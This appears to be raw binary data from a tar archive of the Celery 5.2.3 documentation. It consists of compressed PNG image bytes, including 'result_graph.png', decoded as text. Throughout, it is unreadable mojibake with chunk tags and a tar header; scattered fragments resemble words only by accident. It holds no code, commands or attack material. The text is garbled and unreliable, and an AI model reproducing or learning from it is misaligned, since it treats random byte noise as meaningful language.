zV7$$cTtifS#)RխKh:hqN%TGP pG0n :Qiw ә'E-UUQ}4rÍǘSn c;?T6S>wt/V q|?4*PuP.<)H2\A=*2ƚ;)N-NBrjH``:4c65J.~ٙo{` ӖU6n+X&K+3TLǠT)@< Y1i2?##cXaE&4I%)$/'p9fC` H-v@8T@v*DŌFvutϝ#ꫬ~9"F?.\4I2:]E[Y>{S9q3;%J".h;=͡?gnģNcp{tUru8 5:1\YU`dFFTg (@QfsXaUyc<_~ _(aXU;oo=$Iվgzwfvz8 @(zEJT$wΈq:J E':I hD b-v;~fǴlVVfV岫N󋘨7MU>'o6>OPGJzŹ SڍUJL1;B]t*RwBUfkF+i%4-E}9(b[68Bm>_v+#BX4H"6 =ˎ w8[ٷ$tQC6W&5^+Y wqygOΏOnCDlwAhE a(rȃ2qmçux|_d1pFbcpbAщqy)DGF"B(y)v#HX̜8 e0 /b Mx唉XcЍk3xuiuc0z@?A6=`;BS' oȱ U rX t`YXx@ Q(b:u [?>6?BXߦW c_xv@t=7E[D VJ.sVFC11fL,49Mڵs񿵵0[E08\ \۟Ʋ_L;o?U^AhO lޯ_EfoͰ?M9]6QF2 +7oD* /$׷C}hPrn"۶3lݙm٘\rI..^Z-//y\xU6TȂ͙4{ˣ]hEd=걨\j/Ev~`WWa*7NťԼgxc];^ Zݎ\U[K aiU^ {ok'q7?/¸@W??mݭn't;>ɻK9vZO~?=lccûm-o{sWh4P3{ K;Йo9ά>^k{ϭa9ryyV`9w1o^lm?%yS/q]#|*V~ ƵZYLqp 01 `sq(?+ċ/[.{77kky/e|o`:}72hu\ӡ?55(,~}މv^zj:{(?>Q-<׻VyWqY[3Og6:>Oau}ؔԸ>vb(/nXFGll[}L׿ǯ q\ن:#~'fOۧv(̧48NNW{Iw+_ſ=d1Gfhk~hͿFoMK(;M|G8_vesq?B-Z];0"6 |d:$AD.+jgﻦ!Ux ^5:1} Z >wNػ<=QŠ!o5j&_ߡMZ}&Sؙ0~']W}˥HXױZ~َۿ˸i~ޞCH_~<܎[k.O{bCOck?zo|+ 0p)f]B;yy;j'1?ϻ~|>x|2\ץ?A% b||{ud4S'waؼ3id2Yd^ҥK8qxmj: +OBۆ?pzmz7vkz I!(lg7_͚HhqlyI /ͯ5ԃ ϙQ[\Ϸ?`c& Vk by_'pT]t0ڃ`jtBsW-=\OrD_8 W8Aڒ!Q<_~{˗/c ynܴXp5Pmݚ^ݐC-EՎf􋈮V=u,WkcK݀r j Kb;kUAxdi]#j+okX0и^"bagBD$ŜY;Kr@BΎnƊEo#_O.#LJמF"PK1ϋ!Ndrk7qd=ImƨpǼw4:CֹE! q<Eg>ӻERdoIX Xw+gQԿB} xגiWʁt8|Q7=O/^S6|w׷W>Üᵇݚ/qqcx՞j]^&] 0\htȅ< n'^ Dc93v#kGv*n6}]橍elچ+#O}X޵Q*d 9O9zNWW+PF# A ,b-=g@[ Ѵ(%u6`!WT ooW fy{{WfsWY(Woڞ`41rlzv5֤'‚Keq(,נޭtMeVR'1k==+ Z169pcZ@jm廈t0X9]ۯmن7w ߮0l`_8,sZVw|cN@G)}Z!l4LZ/yc#?|">?xk;Ofrs+EUU( nL;b@zg*0(F `hUlc`2' `'bX_M"R'ݩwE9,&=꯫o܃k[拑*峘lk}ԃ֪e EDf[B|>j?eG+^i Mai!F.(SYѕ jRYo&JYӁk?XZ%~Bh/jޣ+>Xʢ:`7Za0 wU쯂Uc=hX!Ѽݚ 9vտUj{Ј7]&pn,Ϸ͑>1D//TS[u,.4XN0s$A 1 &mb+8ş۷-ݼrL5URBoi\H|}k fⅭ>oj:_IicڊpAvX/p+8ihvi&gXL8[T֧vX*6?/wށs}9ހSsD Q8)7vm[]0/Kw^yʤ90 Cieѧ<~tRĹOD6Նϧk{84< 'Ξ{׷XҕZZooRJ^U0%0™kr긡g!jQيhd+@m].O6_:V9dy_ZL3\O4#q^O%{0"zD d?`JAe?{5k%+t i'b`fdmθS99o156.p(:^}ں>Ҽt-pᛇw'`4Bqll/dxpov:V>5k -( +`BN_Đ.CV" 7D_o:$!_ćߜ_=j(8Yjw8pRR!A>-8Fw-}͋@J(Z02Ф;=,gB{V/#bS |E]9_OrXN,K:"/_ZwYx}M %U9oQm1tX X1Pܫo=aݿ `0}d׷`|aqZqt22Ş_=ץ\ջ c@9TyqVk9ZOgA1YvY#&x &S޽u1Hls)!ôl5򟘓Aj0"=吕PqR@?A{7Ŧ .^N+jE]E6h(' 忲o ~7L/[GS8 -8O; }Lj: EHWtSǰ,t*Φ ╆G3r8],S$%A ."5t F_sc&rF?;A(P2Xm+hFW' 4kחZC/ś\n^km!~^78~#r.nǼyYrըi\V nd36+Uah:\`ڢ7g\z'K#q:XX9Zs* ~ml/4WAYmʄy{I *,E>ue7ɣ^FՋҠz"q,-(<,B"H#>8bUyN JEM]t9QNdN}#ZP C#Nv! P,3W)7_ /n˟~';.`r|Zn:B52igW}gŲ.Ֆ@%+ {In}xk"1TiixBTX,.; FI(gh[(GUiMF7gJjod&kIm7{.WaoCw\@4(*.5[ ˽7lmmTɤu7qm SJA l^ ݺs”ϫV"a0`-`k&0ٸ׭;8ŝZo4VI^fKcTR-+?6T ۏ ֿBL1 K>)Rwm4J;H:ZJ:+GOOӼ" ce~UWM0U,'~KNYۋnA|ܘZ,޹q>3ϴKŁ]R,XUKNwJc7Y`UZ쯺Tc6]bRp?{ _stjTsr/ !^m(w]C?AC\s.LO( :SB+{ 9T!l՞C=S9\XO>hKϤ!"T1%Xli<{tX&eqGQn lt|X[3S-`{FJ%:-%0/֢n"'!ovm|Maޔa=-k=?F>"ٮ 5` V { ghy1e9 @vkH?QG+JEw%:]dSIDnplq^CU36f5ݢNv"bmZJRpNܗa[RQd0Lo52F'b`{Tf[_allS,.nj['J-͌ahH&qZŽS8gk.391ﮰY/[[k0Id`#ÃB4fȠwhEhjT^ ,Ԯ g\SeUi%.57ӥKA쯺D@`96^}YmTyn:z9hq}ӍHs_Q7κ\4J#qJtQ ݕ\LnOFu;d}x\pajZ_6b`ÆG#څ BI)i!z !Ds=rAF <Xȅ^n*U5mBͲ8ymE[%lG^{ç驆 `kk퐣b1bQzAulpNf`޶.7%ӻ dSgxB`+ t/bZ#E JioTɻ8cI}ϫ>F qHu1PvDg Q{=w׿tL ZaNt#BYA^nr %{g%j\O} gZ\/ vCD#j!#8UG`=EH~‚з٨d$Ʊ;l;nIDATh 2 ;Yp_*fZ*FHSv%ID{nhlS]?MKD!G S8xgEpev`8vB{pՊGA+%*"m P*Qw/}Ш 9no"e[YAYF(u$b#(͑ DXn8 T&x或b}nwKMK܂RmW_FҢ_L ~n=ݺ(,)/z*T+{K0Aa;n[it蔝&vmӏmQ / JrBT'? "lBH r6.kJq= WΜJGT &8xa`z{1ϝ^8Ɂq9Fѱ]ƞ1!LrٵC }eh[ mp8ESڛ=WIW>)ar|ݻﶨt* ;Yk}W[;ՙqn JD7,w2*̓)%u;m9X-oSFLѾCg aJj߷޿B<@#0ְF ge"Yxdٛ~'cՅ ^}}?Gc( c| /Wzr`KJ<\.Dl]sN' ki\#xm"ނZzޛcV͙`4?5y1l ~½eq=_ՐY$z4D4[sDRRͱejb7?Ґ>wB3qJ{S5dXb}$k4 B*L[=e{K4Ktw%mE.,/~mo"&bA~C?A p´Rj۽- D"1L~ȅ'QàȫZ _}JA ;C]~RsJ0tX['av՟ɜ@mD}H.czwp}Ou%X x9d51tc)X^ @Kx)o=;hrm(,BZl)&96g[bcqxY z,C$#վqc;@%f PT\6<ϙwlDO@K1d5k;բN|hnrL?j_AǢWsUN8%wL&50ltLh>'y'3`ŘB7\ ˅͙tއ_P6䘧N"~$Uy]CM͎懥^myd2ga6B\ *$>2 Hpq@TeCPFΞ6# NAVUmY޹UPJ1zu*Ouyh4Ljp$a5-ە;>7FYs)|5}qfU8և2 ;eXa[+M X'g2\j¨. b- ! 1ljq5sLpy%h.5p&j 5^/n/9 䫗~5#.M(iݡJ69o.pѦb4ۻ,+s]S.+gfU/K"P) ޿X$-L! )t\CH߫@D#K*6s.7D?5~; qm`N{iALQ5~.F#%$Dp0XHBaȅZVl2K~C?A}k٨Ʊ ^[ctUᐩS Pjxҩ:&RLdb:Ymp8/Z'rkƔV[ ՟vX!aldDjUahW!1'c:$ADZs->2.v,(y,,x?ѷl޶ʞayFԢښ5?z~f5 j4v9X0myY'eAB3#*WtLMC1PKCgfTܭ֝H@׮R3r %g N0\ }~S~7-]6~RT ,.;z !ks䈖VXo܃9bӕyF7(<׸mCˌV |稢J‘(+{ p5YM";8SY'g yyKrYe_^=_lTi'0=^Wkhξ vDp=r6V>(, ƣm{ l?X;|MASǠuӞNq ](rȄTѐѾWf.W33})ji7a+Fq0©`. |=n rsU?A$cJJt[P5*c3Pc2(aJ.O7a g 'a &Vrkg9 e( )}yB] 674R%.{h,BjMEl(j%v: UxӁA@'2wS[nϡxٝ?@3-"hc#pcS)@7x?Kb"0JGmw3%{$& mxY c9ܾ9}lrq&/NZ7h =bQA:Xbr_N0`[y{=c523[ؘI]p%0}C7'e 6aA N*[@빎Njv1>. kσBaͻ-!o3^mJ2E\6EХY @3 xvqk*փ" {F1 NB_tX@F ZvH-,F|K¼:zaC\ـX< j4ߺ9Y-uܹslX'=3cցS DY )ۙ-Żg NXpgkb.;!p.f&xPPk:;V) #~eI%6 2 ;f*v0xbL YzhtHB4r^y jc!0bR8MEϲpVC#E/;D1VN )Bx0萬9 CfY9 KH}R(clIJC=zg`,J[!  ^f7rNUg[\!׾KZ\8#zYv"\l2!C.x[[~ecЇ^%p}T`^-&V:a"ї p.tl7 N㠖Lي8m Ar٨('3"F#7YVlf 1]$͏UVJ"5iY^诞 @Ӈed% ~ Ȑ8iP q=ɐg ML±-3)h%D@VCp?OXroM:04FN"X΂cw~] 7K޿ 3g,'@_*F쫉h[g)/rd9qXʙ+HQD"1{tΏ8B-yz8+른YDVc6K0XѴCp86cc6*bʞyZ*H`q z70vMp+Uo\ؚ{uqu0+ "ϞA(j*$"0Xo*q<ǩSm*"^r ,/(Lxw{AAP]ԏ!A%lGe9ToǡsHnc#@ |#Hx+!/1\ pGnt7p|l 8>6;~ En.bnNM@xZ(jH ,3 a[k[Nv0, 0snT׍h:5ȊEO?AA?A}gW\½[Uu`#oC#훖Dja &f4d +!S.]90F9}ѿBL0ݗGpxp q3~k+Y2J٩~To7 (8d O'F*lTDfo6_g:( ;I 'B" c]Ku]v'| #035 F߫V~|ot37E0=]+7ߟ .>O[7oOOg?Tˢ ج:=L:&1jlt`: HwF$SFF 6OL3!u5w$3< p""ceubb!X39C%/ߎ ]8lg}n[g/`2W!C- "ƂZN3x݌ 2 ;ɞϫӋx: 0ѓ$80N- իpΞnIk|vwvxc87}D~zWٽ.YHygF<߾kЈMXL-\z5#[5Z/ A|Ȟ}dm-;Fj׆߽5N4$Z2N1xFG?Q<`h4GyҥK8wUKcPy(Lk0Zr900OY//q9pfDa)_FXޅ T6rZ7^Yj߃TWbh6N"A4c㎎īimc0--J"\/_>\u )EbG@>ɚ2}xf r/ ~, m{5pr)vB`a e"`h_kvGQm{#,A"(-9pE9ȣڽnK d aƇ2 +b:$!{=_\c!+X~6&Dq7jxӦqї:M0.GG!7/a.aVSIQ:,^@!H_uJ`ai^Z?c)X=񿒶- 1*!g8ㅿܗ;"BAYLk>.]?ٟE,edԢ33.ki O>{?A=GVT]{kл@e0a|*e3#YnD`tIBkՂ0`0| c\c>޸$öUUap fnCa `1]Eo,K1琶ulP0 0]kY^]@;y 86S>1Aw=c}Ncjxyc*O"4K]xmDq,XO%`fnxX"b~U ٟY{h,@%FEDVX{,[%v?ǧ>sEZ-x ̭AdY(nk Q,$QRr@q2*bob בhtUh^Arq;a98%LE\zj`2d!q-F+2 ;Jo L~ >*wrE$8!șS°\PsIu8z7ĦCWc X^مafTřxixggM{JݪuXs ?̣g c^{XJU`=Nµ_GeYܼc$lBT(3ݿB%7m[д\_?F4 A/@ T"cwDmARVdD8^?NAӮ y!J?2/B'9c/>S,C8b*E,#’ooB#{[H$& Њ0CaDQz",|%mr JZKr4zG;<{BE:D˸d b@.E/vDyKDzr,\:ca 2MXE`gX{o@wK.%87mAW>1Y}w.'x,VoT߷z:2x,»1!x>xpR;pwq ؘg~_?Xa;ޱM/z7`&O/?8$*al[㵺䙕W[ 8B&GI݂:gsː4nEm87N\Xf{Nk/aOԓg EL~5 2x)|`<ӿCH.k`1}2RCI'kwѷ_]6 zvL@?A}Ŵ- O:~+k~ C%y ߃w=e'K8^/s(Nvm5X C '}ZABk;P9ϰTv5ߏ)`qы(r_Ç~ań,n+v/˲ o7NG"-A}?TYe(^t3Vjw:w {P?g2EU0! z:uc(uo!5NRaEfGk_k9IHuԠ2?)ixzMd,>o Z3t3/a{a6O‰4>6ExbGmVY0r"qu88,Aq0v6sFt%%m^e߃BW.ٳX˽9! /oO`_z}Z uPٛ\YxS2q?|ȷ ۷obmdGWp-2 v3zy bQrbghNKc6sܹ 2'lo^|>n~kzqzm= ^a$؂(%'IsPo Hgy=BB ǠX d5WU0E`m.ۓZvj,ɐ (^%۽r˸/dfv, , <n8x7nammo+OMA2r( G7fP?A}E xG_|4 l=2mmCN_w kH!gė^a':A;{}x^-xwBAk= d$'mln|΃y0Ǿ7[MlGG}5&7?տȞE #oN*&w>7G]-][2IH'$2/ E$U!yQN+1ffz7ׯ¼!!nƷqዟm$׾]]_+kpy_ot]TʧlfxG[w~8>w_~{FnSŵgm.bcueo>vn( /Ho~7}y{ KG7ov|CbY@gΜAA ,v%Ueٶ: FFFpܹA AAA  u0صE bgg@?'I":Ng# 8v nEiAAAqġ   x    8dAAA   8OAAAG2   C?AAAAq'   #AAAq!    8dAAA   8OAAAG2   C?AAAAq'   #AAAq!    8dAAA   8OAAAG2   C?AAAAq'   #AAAq!    8dAAA   8OAAAG2   2 37    70 3̠w    xi{BAAADy u~ 0=#   #OZ}SIENDB`././@PaxHeader0000000000000000000000000000002600000000000011453 xustar000000000000000022 mtime=1634048807.0 celery-5.2.3/docs/images/result_graph.png0000664000175000017500000010606600000000000020310 0ustar00asifasif00000000000000PNG  IHDR(@IDATxeEO'@2#P0,aŀa`ouWuWw3- *Da a:y~}=ݓuzU:u*m{@8#8#0aY^#8#8 #8#0y^#@@K_ ?%Ns XzlȃI#Ią% C9IG"yyyNaɸ]i-=KmCXNOđ.q_W B^Һqyޞ-}ݫvi8i8nąr t#?婟+aH~MAR$I0PLSH~H~A@D40P ]WaA^Sw$0/*x '=y,}V#5oqaq2}PF(gB(Rt]=]ҭvWoHgOvf pA4mݳ+G=J@r16֎&/'Ưk WKӾ)aĈ7q,2?b[ؽvH-_$XɲC qT>a);) M`҇t|;\"TXDdX*N |VI%%mX:I ᤳZe_,OVH=q#1wB g|1@J /EJ:2R))*5)8/ҫTË,aɼŖHQ$n#c!<0 ԫ쎤?kOgOT! "mblhѡ@E݌8ն@sj:`$HS76VCtQA'=8@1H#$}JBr2;ER$q8,{ )3)Yo_8ey!~IR\b䤴LV Kđ4.TJfGM8`]ڻڤM+A:6Kji-N;RᠡSf_D@ A!& Im!8$FnG`0i i Q;叺{IK)apFy2#z(IѫB*J+BDXD\ŗk{=x?F >hlV֔MZ<gi:Z$tQ21n0\sJ SÇ@ap҆A6(q IU +\tB 4R%+}=*% )))I2,2R IQRY2lWT}'{軠,Fp()h EÛ5I *YC4b@Ut@3 4K18K_ %= av&U  !)PQSQ#RUUeDJ %Մ\7㏀F#MFiи% HOU K0حqs&T&uoܱ$aҊ(MH#H$B,t8#3!@aRC@:ۺt&H:fO#f U7[f]^E g7@"o_'v :u7ѥRXSe=n`4#8#p"䣻]B@ڑ{{3$7u̙:WL+s `Gi(`(-d5jJټc2)(JWVj+f{;#k]wjS[m*heSfɢi dEFgFm md˛\L2D!s+4/_=&|Ae<FߺXyI4֓>G|q0 FM'Zhc}-m46qx;d҅xoJٟ/  9kMrq7dQ? Ys}seClkS>zJ\ A2hX<-#Z C.t1N]g }Q%>HpB aLdZ F#ՏF quY~rQQWDccSq8 IO\l_t]UQo?J{qCao)EMJ:e+c?f=xOB<pcweckLE-szt ֓$OWAQIxG#}Lϔ)]z럖ZadiG͖?zάMOgH-܌t s m69#ه+17͟R, ;!X?g(@PZ]*kY-pϽ㯆0`]=a`\E!z!|[!CҸтm4 ~V9C qqDLɴHkd> 9RFK޽6?cOqXpʐtDA BϿtKrUJDcM 2!4~Zy'̓rk 9-Gl#?q1a ez\:go|V>q'R/8 E2]?<+FwP'BhX'ѸlsǯJ褴zɼKdꢩҟgOzt?zYU,M| ;mʣfsLhxݝl*qH&$Z.޴Ȧ!$Ѐe\&ۚM*) X6Fǜ7xtyK?( ~`+86.NO@? U݌j5ֈ7b:Ș'Mi3ߵh`0Ӽ{g-7&!G%S|@_bW=H"g| X! d+ea2ݗQy\e!E I?^~_]y0]^!=phL /lO,RI<Ipw@thG42M$o*Ix\߈0p@_2$ǭWܗgR%OM BRó8}tA..yϷߓBrPxh#E3NmrZ7rxpL s4G{2e*)>yx)tjU]ZIJx,r+2o<G9eT  XGN)rAټ "CA+>: Q;&`ʔW&™cnLwf+υɴ0\֓lֿ~k\ignxƖI2JN70ir^\?!6|)eG÷ l4.rĩot`~`LWo1}ݼY*&W^RL ߺLmƭWooD©aygY_<[ʦh0iٕ,?1*7 pt3DQ]V-!+P IO/aѦ!9PK/?.<.=j2շ _t w۶rߟ'7 U+Tn r˅߼0%Uq4w}]=~mIߦ/ʮD?FS8ʾK-eKNcՎH61ɿIPdL6 v p${?VЙ I aJ&OxϧS@}hkxP&铸do} R,cTs^LlFپc:B'?Forg_AQg2HGC02E K iѩH7M/n%ݼSqYqz>qR9㘳'H2 kd#zf1*v=P=,v_/8* F=ס)Q&ʎLp s #9TϨ6A%lK=:b(7. (FMC86bS:h$0{M؎!Qf:bDuG ]̶ۆl}v[u+:?n"  6}]UYsƳRO}pi|(a´k: q}Fae=# )Kwn1~qq[@ IV3s5(WSNdmohO+ aU!C|N|~MsQo, f,W]DK`GnY!ՓbZ5Zw!ͫsqx.dRr2Ю5u(>/vxX8\+0~tm ?猼Ѿg`XBБÅqlİ7AtƉk1K߿.D\d纝3.&) ktz]X)cj䶃a.vd3һ,]`{to!-wg6s'#=Ԣx+H` /%aڍzYnHwq?iϰiH'$6c0}|qUȋ~mPMGo]?CzPl#`]]Ү|@Sʱc'>t3Fb#Fꆗ~E6l[/)*N%U%Cr#8#ZӦ[Üis9GsԮ,2s~ΞNYe^+dץ-1V\ZlJEEbC5@=8#Ldбczsww&k*jYA3`Y8Cw.ڵ-x`7#C77ڭkdMM((BSXbSIy^G&0=pG` 4b\ ^lUN0f.#] T!s4/Ğ;{B02`wolڹL z=x^'fh%sth8cgD{y#8#"`蕞vJ&OM[J̚<;ef޸lO>C0{ҰY6$ڰE6om [=ȇӎ7S0]GpG`/!61g@"xr6i̮#'͐fɳdEv:K(<L{Wlk*[u3m6Ͳq[lʅd (()#%ERpq#8@:RҠ$Ȅ`yH?q !SUdZ4Q;Ӧ7pOaӥ$ʿ{K`d+ -ykgNk[m(=`7N! …eFD‹-l7#8VIVg※‘H&Bb)dZ4,R=U5n_%qgIm}%" nPBRZ/MJBD,jKtE%EzD "bD1>< vG;=N~=R!v J;Q(y30rUMVB]g^9vo=%Mh^t@ m)܍Ц]vі\V))RґW'JHa¢B }yn/iGkCz0(q lw@*P=c) aYgILQSQ+\J@ Ҟq1F8ҥEl47$,mQwK{F;IgW;tDG]JJt^.HH*vݑ!0z# )nȃP^=݃ @QZ;&ReJj*rjZIEUY8@ ܫc/ѪmDaoz*v))!_ (,RU%FL tȉJM WbB!/p@r"C0RM8~=Lj ,|HJ,Tc*% ʲJC pnf#cc[wdLkAҦz";4MɈAR4]IxkPrtPMV<%,FL4BCb48 %#!P2^ FpkJdi $IJLQd2$ ,@*J*Be6P6n,*K8Ü`_8~]=].hͭDJsݮDS{:,}nխ˫Ҥ([H %DEa#%3caVG`"?Kqcg!n:|.D*0c?cjMC$ p1(֝u{iʋVĠL aĕIۤWKJ`88>xv]փsx@HXu/|##I<=ZW׋ׯ-bRS=HZ$C? 4JD,R$&FT`;Ic8%M9 )j6}$t1A /~ H#}Qv~E^tE#gN(9(SRPR!OI-8#jP 9{>}cLGսt@< 2=:mn +!CrV&݄'iWŸ6KnE+F: 2@dIFF *z $ǒ$YII(%9̠pғ?]Ү-Odi $c^}!&7pt&;88&!ICVʈ~˔ #}hc{62aq:uGpGbca>Ӑz"* PYbp',m4\HE<Í#/ c_ {:>]P7eu~%B[Gcs?C> <ܻiKt| y"dHX4!ly$J:x MvIw*މ@"͡RщA~}&csAx(A\BI4>?.A#JV,hIpә[ 777$ .,H ~~CDx~n-ryRG8Ş_pGG`#^#8#0Qp1Q#8#08GphGpG`"c~yoGpG`p1zю#8DE Dގ#88"cGpGpqD 8E;#8'{;#8㈀q׋vGp&*N0&vGp'8#LT`L/8##N0\/pG8_pGG`#^#8#0Qp1Q#8#08GphGpG`"c~yoGpG`p1zю#8DE Dގ#88"cGpGpqD 8E;#8'{;#8㈀q׋vGp&*N0&vGp'8#LT`L/8##N0\/pG8_pGG`#^#8#0Qp1Q#8#08GphGpG`"c~yoG`nORK~~^Oi8# 'P0GmW/74܄]{o,C8@&`dBG@N?LT\ud)DpFi8# Đ$S9F~_VmX)e2vaqttcќ}~B/8#P8|8DGgPlز~ĹqG`8|d8d<pd#Ur1UT%|sFGpC px#гGɳ8ɥ^=G ;N0㱎G JiIi KpL8Ȅ9@ ‚B9u)܄qG JdC= H_5gS.`jHiݛ-E/ܘh凸NM!TX2 yey*'W<.yLJ8Ҩ0ͺMH+z^`GyD @]mG2=pO"@'#=}zv'm!G5zzWݽ<)_" qJ z)<'j$4B<Б/4L$HFkD#(PB WR9Q2R_(E*!HjI'A^pWIaa"-_K-=vʭᔡ~G@E Ɓe.J^= pU?$A;tnͯa!W@Fq6$9%uhĨ[sN&yrMܩ16n+?kaQ;^sZ>[8Ƀ&I$Ñ3yOyҊPRޕ# dϤA b' K͊JKwx?n*ɍIک{6) aW;(|$=I'YAmBM$_b%(JJ jKIQK4EV -%VqLWZTjCD0'21>'s`9f4!e6~ >akȁwh\0A Ld3tn i&. (M(! C^KOC9P@ $Tt #!}0ޯaxj4#82oRH җ@J ,2)+)Sw'H)azl//.' KI t]m**Vw^v:,MӴudpp]کC :j׎4@Rp7pG@ 'Fܕ`ADO^Q93JXJLIQVR.zUJEIVUZ.77>N0o hl֎ĥCt[ũ]ݐήNOU {NH !F(`Fo4H%nGDrbdD %HM!\ɊՆAӔ}= Vȇ*,S2ulW8qAZ?8؋ߊ^s{4w4KK;YZ[nno&oiK lלSTHΊ$$ S ]"^o89L@4{HMҭJ=CP05Sf%"5RS^#eR]^ĤZ*+ͮ*JטnwA`1FAD(YP?dZUTEKaq~^pKp$Ld 2УS;zvJwwwB7MͨTF I]e%%ꆔԖJm$uݒnctE‚4A$4@®o-;HE0PT$I $E ¤ :pG`ؔ R%& 1=@ӕXmSN@<&WM:=IIm%(aT4"# ʏ杲 ڡ̓(*u:ݠdD+QHi QZ<p}@<յˆw>:ύNHUELT#"ՓN/(QEsr[VѸ]m]M* HK%T zA& feGptC ѫ_tÒu2fL*Sk{LLK}'9+,4lk[VMqPT:MFtRP2z )Gp 4- 24L_NtJBai2v̘4CML2%`bMzmkYE,YZV*eJ Hp)P)n'8#'@4tw^}}љRNЕ03l̙M0inZY}۾V6`Dz%%RPU6"Q^K0DzxY#8Ky{ģ]Dhw`cٓȼey2o|3umv6n32fjYe޺JVm^;XQRY"E BadBDqGpTjM#m=g#3dU6]4 Y8},HXϐF06nW7"oZa%Uz`#p8#8 fxt蕴njr؜Y=v^m &^X,_,_\ɮezЎ=`Ԕ, ~SGpG`?F%f=xCötgg󎔣9ƍ`1Պ3+VR=zCUw;X$US m'GXںUڶ)܍2s,9g#OFhFo]r#7HOTͬڙn?([GzDvNa?}bҖ3]ve{uGrO:[S%߹S<_}꫙c]q9]/ʓ)ݻ|K߷TNQ &rOT>y'SNesy\+_׶D:[ ouO%~R9ge}lmz{z]*%o\`mAN<+FpI$?X**25KymyƸ8r=f*?˼ t*o `yg#fʻς ~_ `Rf}2.KfF=ޞRw;Ҧcw_->8{-/r#-951w!4`BG(9ǥbNA^h*.A04zĨ0SR2x,HBzvp"yg%Ƀvo0t~ay늭B' ōF13,{GlʀQo?z(yMF}h9 ΔۼCo4RGԽi&#\#:^5#Kz4GtHbvŤ |`ǩ!pvo6ҽ}y|u\{s1=ÀbA @20nb28x,;A" ˇqiͯlvL@ґb0 { !ϟ)K/Y*SzqNԮq;A[\^6L0n~(N.rypZe\:+G̰(i0}CD`ݳs/( I3߇ΟQGVZAn [qP(%{}& Qjy]5G (LF&!$ s} O\h|z˳t3B#nP2䢜sk#r|F0ODaO;%W\b FUpzYէ~ep١F>}?5ʷY}h (PÀŻf3ܓ'0ܟ-M}yY$.&-q&i3qY{A!+S* d`?p#ν)cۊm8;^_t H5OI IEnu m6K|3 LPSuHWt/pv.HK;]?9#@_߾]]_)'Ku^\5Qɒţ@jJ<}6UBc\'A'd0y6胩t~VAO!4\sNdAa͉S&sÙe\f+!I*|JG<ݳ++"E0d&gr`]y&8'Zc9!-k,z" GZBgw. S=#(ՠn.O>$H.̽߻W4'~O]-7[?k!b7<ѻ~$'^|8grsAGƼ?[0[_j#[4Und biX0q$X͸,νhޖJl"AG)Wޔ h"7&yWyEc-{#-?hp%eo]lE)bt"o^"H0,{0G~!^~B7gj`_ri'+&w|/\MfyyRwh0K2ʂ@{}4omtZ_zK$L $lŃ+LlC3B|_Ť 0@a " :L) :=:> E|R\ _8,E.Otηwbɀ՟^kHTړ)?ߚ"Aʄx}B\:ݦ|X:yCY{{br} dNe8 DqCBL.enŹS$Q aOsoyyL#G`[n0I !o۷3@I7 VJ "O:]澿6g7[7em'w]>n#@{?W“-OxR6Yf,kDC-ܒU[~#D20JpF/]oDBDiOK, r܅)L FfޔΏjL4Xٸ]c:% e+Gd-ߍ$A#):#SEȂ&<ڬI'G`Ci|ݠDYڜ t 16"7d= t0=Lz̸u̇Û20#}by.CCKs1qeǿxvUAy& ">v4tuP :8 `& UtNevrdGbѸw~"\N2gh.qOMo+CZ#piljE7ķEf[2DA2N:}D}Z*Bi gZtTBk=8D "o{qHC4aٕly]vdy--"\;Q~/ y!&!`Mɢi0e4NG:T)}e!V*J+䄃 vR_,VMo.=%h[fjp.{W0o<E?|6t'N s3=o(`,!, ď΋o )cS%~TÑU#LM5llU ~6箘-swf|\h%!$<訬y|N \c ]{w =: ]/ En /Kx7]ѭisYx + +;R:Q죁3)vV A۳>MٮK$ek[Tv9>j"kv,nWW_yTۛBh#u~=7#]Zħ('?J ֱZ$EBnˮJt7ğBW%E?aǽY"#}ڷ=2E=/ >{uE'32 PWeu;3EJѧ` 4&,S_[g{nQo;RlQnyM"b*u#aZ70%Ae` T!^ :L2G[7} Ar/l7F1 F@{,f*0VVcA&"9+؀KJs +A"E+PA $l]7].HJxj= tmR]^-Kt؛L5`B0ϳz*yvz=#kaMXZSbLV>?y2f4L2}Jh Mh sÌE3偨)D.p^qoὨ|OFQEl5} )gḴ|YbU\M Ɛm?mJF:|LAFf*EJD'~W7chyOLӾru6u%ٵo?cxN3SaLN0&_./[.׽$vlY)+/*Z^DGቖnGpG`"#2Յ{OKtwTy2klY̭dħa!q#0}RO#J":W⌝@ JLi5er=VC=QɶaCbO<Fڛyzxlx4(ٮa8PKM _oG*A?$ضGb8iGp=HBO eo=ݺ=ݩ:&m|ME%zPW=YjkI`3tHc[F%4ES{:6%F:%#!-p "/m>mGp%8B YD$Iڥ;J*KNREj_zY`b&2Šf4iXSih֎V4l$ng@L $I S4&FG@Wɩ l#]Qa]I:KKҎRP^F6]a{s#:mǮO(hѽ? "k8nvI{n\} R@8DwmD$nnMW -xGpF@ F $ȁ#*EH %%J*T@I~#V{B'eJ7N005 l6V۳!3&E? % Fe$EOmewO"UaUN4KRґu#!䀭U&-P]RhRI@ӛ* KKKݢ\O,TbPeu0NL\<gpA }kwoIA:T!L@@wV ATI& Jx9xl*i%%FVtW#,j[¢HL 0~7yǍ#0Qs D:x dž$I'4`+) M3 }!)R.%eeR҄Jխ~ ]Э-R\N0䝴2ݑNHCHz jw;{WXgO"mw[zȊhPث$h!/HNDȋM$l#1@`-*Mϋ%EFtSkZ]_f'i<:o:aUo$EU4tK,^VF*_Ҁt oO6- y3/.*%ŪPV4+(UajCRapˣnnq@V`d#4]HHzN$I၌`ރiY4-q=K't\C @< 0I%$x5l oҤ$i!mOo6m})Of 7`,!bB 4 &WCtr!&Z5 dtPZ*Nttq?eYM4dzp^&N:߈D\,+ӆP*Nl%V@XIaIHi$" 6l&'l; y==gGڕ  =萌(94iHǽk _=?4VOPI?&H:Nͩxӡ8=1}j*̻> yʲ<ݥ9mSᦓA$!,ϤB_;wyI!MCN\ 0laQ(H[z.?');  - 2zjG0|p8#8"cLGpG`x=pGp1G ƘC:#8 #8#08sH@GpGpupGp'c8#8N08#8#c!GpG GpGs`9^#8#8:8#8c1 tGp'^GpG`p1z#8##8#9N0R/pGp`xpGp1G ƘC:#8 #8#08sH@GpGpupGp'c8#8N08#8#c!GpG GpGs`9^#8#8:8#8c1 tGp'^GpG`p1z#8##8#9N0R/pGp`xpGp1G ƘC:#8 #<򓩸|Kz !Gp2!#*8!F@koqGȄLx#')nۼ6nˆ#Gp2!6Нd0G\˪ +LN1,v4Nn,s\Oh|G`x G,# [87# O ;,^tJ.J^^*xonˆs8p8wCz(y['«#dG Fv|<aR)-)M{S~w8# 'P0GH!PXP(.9=5E07#dC[lx#ɇ?]9a 